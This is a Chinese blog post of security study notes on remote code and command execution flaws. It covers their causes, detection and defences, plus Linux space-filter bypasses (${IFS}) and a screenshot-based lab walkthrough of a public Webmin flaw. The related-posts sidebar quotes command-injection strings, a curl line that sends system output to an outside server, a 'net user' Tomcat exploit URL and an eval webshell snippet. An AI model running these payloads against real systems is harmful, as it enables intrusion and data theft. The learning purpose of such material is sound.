网络安全笔记 -- RCE代码及命令执行漏洞

已于 2022-09-24 22:26:56 修改
阅读量1.5k 收藏 2
点赞数 1
分类专栏: 网络安全 文章标签: web安全 安全 网络
于 2022-09-11 17:44:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/swy66/article/details/126805760
版权

1. 背景

在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行执行函数去处理。如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将命令执行漏洞。

2. RCE

2.1 RCE漏洞

RCE分为:代码执行、命令执行

  • 代码执行【危害:执行脚本代码】
    • 脚本:PHP、Java、Python
    • 产生:Web源码、中间件平台等
    • 检测
      • 白盒:代码审计
      • 黑盒:漏洞扫描、公开漏洞、手工看参数值及功能点
    • 防御:敏感函数禁用、变量过滤或固定、WAF产品
  • 命令执行【危害:执行系统命令】
    • 系统:linux、windows
    • 产生
    • 检测:白盒、黑盒
    • 防御:敏感函数禁用、变量过滤或固定、WAF产品

漏洞形成条件: 可控变量、漏洞函数

绕过
linux下绕过空格技巧:

${IFS}
$IFS$9
<
<>
{,}

$IFS在linux下表示分隔符,如果不加{}则bash会将IFS解释为一个变量名, 加一个{}就固定了变量名,$IFS$9后面之所以加个$是为了起到截断的作用 ;为什么要用$9呢,因为$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串。 不仅\ $9可以使用,其他的数字也都可以正确绕过。

2.2 案例(公开漏洞)

平台:墨者学院

在这里插入图片描述

  1. 启动靶场环境
    在这里插入图片描述
  2. 查找Webmin公开漏洞
    在这里插入图片描述
  3. 使用BurpSuite抓包,并修改参数:

在这里插入图片描述

  1. 根据题目要求,key存放在根目录下,查找根目录:

在这里插入图片描述

  1. key.txt为答案,使用cat命令查看该文件:
    在这里插入图片描述
s.wy
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
RCE漏洞
qq_46430168的博客
07-04 794
一、管道符 1. Windows管道符 ping 127.0.0.1|whoami   | 直接执行后面的语句 ping 127.0.0.1||whoami   || 前面的语句执行出错则执行后面的语句 ping 127.0.0.1&whoami   & 前面的语句为假则执行后面的语句 ping 127.0.0.1&&whoami   
RCE个人笔记
weixin_58107256的博客
08-17 148
什么是RCE漏洞? 远程命令代码执行漏洞,用户通过该漏洞可以对web服务器,或操作系统进行渗透。 漏洞原理是什么?
CTFHUB-RCE漏洞总结(二)
qq_49422880的博客
05-19 676
CTFHUB-RCE漏洞总结(二)一级目录一级目录一级目录一级目录 链接: CTFHUB-RCE漏洞总结(一). 一级目录 一级目录 一级目录 一级目录
RCE&代码执行漏洞
weixin_54882883的博客
06-17 873
1、RCE执行-代码执行&命令执行
08-(RCE命令代码执行漏洞
qq_56414082的博客
03-28 884
RCE英文全称:remote command/code execute(远程命令/代码执行漏洞)分为远程命令执行ping和远程代码执行eval。
第30天:WEB漏洞-RCE代码命令执行漏洞全解1
08-03
WEB 漏洞-RCE 代码命令执行漏洞全解在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码命令执行函数去处理。比如当应用在调用一些能将
CVE-2020-0688 Exchange RCE 任意命令执行
03-29
# CVE-2020-0688 Exchange RCE 前提: 已知一个域用户 影响版本: -Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 -Microsoft Exchange Server 2013 Cumulative Update 23 -Microsoft ...
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
尽管其 CVE 等级很高,但成功利用所需的复杂性表明广泛滥用的可能性很低,这与广泛利用的 Log4j RCE 漏洞不同。  有趣的是,Chromium似乎也利用了unrar库:...
CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 复现环境
04-18
本附件是对CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 的复现环境。 将文件下载到本地,直接运行tomcat 启动服务器,地址栏输入 http://localhost:8080/cgi-bin/hello.bat?c:/windows/system32/net user 即可看到...
网安入门22——RCE代码执行Eval)
最新发布
m0_61499194的博客
10-13 178
error_reporting(0) 使程序不报错,降低敏感性。preg_match() 用来正则匹配,检测$c中有没有flag。这部分主要设置及代码审计,要先了解一些php函数。拿到这道题,是一个白盒代码审计。eval() 执行c命令
Jumpserver rce 漏洞检测方式
weixin_39811856的博客
02-04 688
1.通过对实验环境的测试,发现每天的日志会清除,所以如果是昨天进行操作的三个参数,今天是拿不到的(互联网环境可能不同,检测到部分互联网环境会保留半年左右的日志) 2.能否取到token 3.通过是互联网环境的探测,发现api报400的现象,也就是对该api进行了屏蔽 再根据升级的补丁(删除了user-only参数): 第二个修复路径是apps/ops/ws.py 这是一个websocket 连接端点,用来读取日志文件,修复方式是在connect函数内添加了身份认证代码。 也就是升级后无法.
初学RCE(远程命令/代码执行漏洞
热门推荐
qq_43814486的博客
05-09 5万+
RCE英文全称:remote command/code execute 漏洞出现的原因: 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。,这就是RCE漏洞...
RCE远程控制漏洞(上)
hmysn的博客
06-22 921
目录什么是RCE远程控制漏洞漏洞的危害:PHP 会造成RCE执行漏洞的相关函数:linux的命令拼接符号:RCE漏洞作为漏洞中比较常见的一个,近年来在apache和python等等软件上都出现过巨大的bug,本篇文章对于RCE漏洞将会进行一个简单的介绍,关于什么是RCERCE的危害以及一些我们在寻找RCE漏洞时所需要的简单的一些基础知识的了解和预备,下一篇文章将会在靶场中对于这个漏洞的相关问题进行实操!...
在检测RCE漏洞时,判断RCE利用成功的方式有哪些(无回显情况)
weixin_42478365的博客
10-09 2085
第一种使用curl: curl "xxx.xxx.xxx.xxx/$(uname -a | awk '{print $1}')" 这条命令拼接了两处,第一处便是curl下我的一个vps服务器的80端口,第二处是显示内核版本。从服务器的web日志文件中看下效果: 发现操作系统的版本被拼接输出到后面,在面对没有回显的RCE或者CSRF都可以使用这个技巧。 第二种:DNSlog windows: 操作系统 盲注方式 windows %variable% linux variable 反引号 此处使用公网一个
RCE 漏洞 CTFhub学习
qq_51954912的博客
06-05 1027
文章目录前言什么是RCE漏洞eval执行命令注入(无过滤)过滤cat 前言 之前刷buu的题的时候,见过RCE漏洞的题,但是由于没有系统的学习,解题比较的困难。这次,系统的学习一下,再去解那道题。 什么是RCE漏洞 RCE英文全称:remote command/code execute 分为远程命令执行ping和远程代码执行evel。 出现的原因是:没有在输入口做输入处理。 eval执行 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST[
漏洞复现】2023HVV WPS Office 远程代码执行漏洞(RCE)
做自己喜欢的事,并将其发挥到极致!
09-08 2549
Office中的WebExtension是一种用于扩展Microsoft Office功能的技术。Office插件使第三方开发者能够在Office应用程序中集成自己的服务和功能。这些插件采用跨平台的Web技术(如HTML,CSS和JavaScript)开发,可以在不同的平台和设备上运行。简单理解就是Office内置了一个浏览器,可以解析html/javascript/css代码,本次的漏洞,就是WPS在处理WebExtension时,未能正确的处理javascript代码,造成了溢出RCE
RCE代码命令执行(详解)
剁椒鱼头没剁椒的博客
12-20 4374
借鉴链接:https://www.cnblogs.com/networkroom/p/16395024.html当然还有很多的其他函数,可以自学百度搜索。在low级别中是接受了用户输入的IP,服务器通过操作性的不同情况执行ping命令,并且Low级别中并未对输入的内容进行过滤。在Medium级别中是对“&&”与“;”进行了过滤,那么这里可以不使用这两个破解符即可,使用别的,比如我之前提到的“|”或者“&”。在High级别中是对“| ”进行过滤了,这里不知道是作者无意间敲了一个空格还是故意的。
针对PhpStudy-RCE漏洞EXP的编写(python)
认真走好每一小步
07-22 179
有问题可以随时进行探讨哦!!!
深信服edr终端检测响应平台(_3.2.21)代码审计挖掘(RCE)1
08-03
本文主要讨论了深信服edr终端检测响应平台在3.2.21之前的版本中存在的一个严重安全问题,即远程命令执行漏洞。这种类型的漏洞通常允许攻击者通过注入恶意代码执行任意系统命令,对系统的安全性构成重大威胁。在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值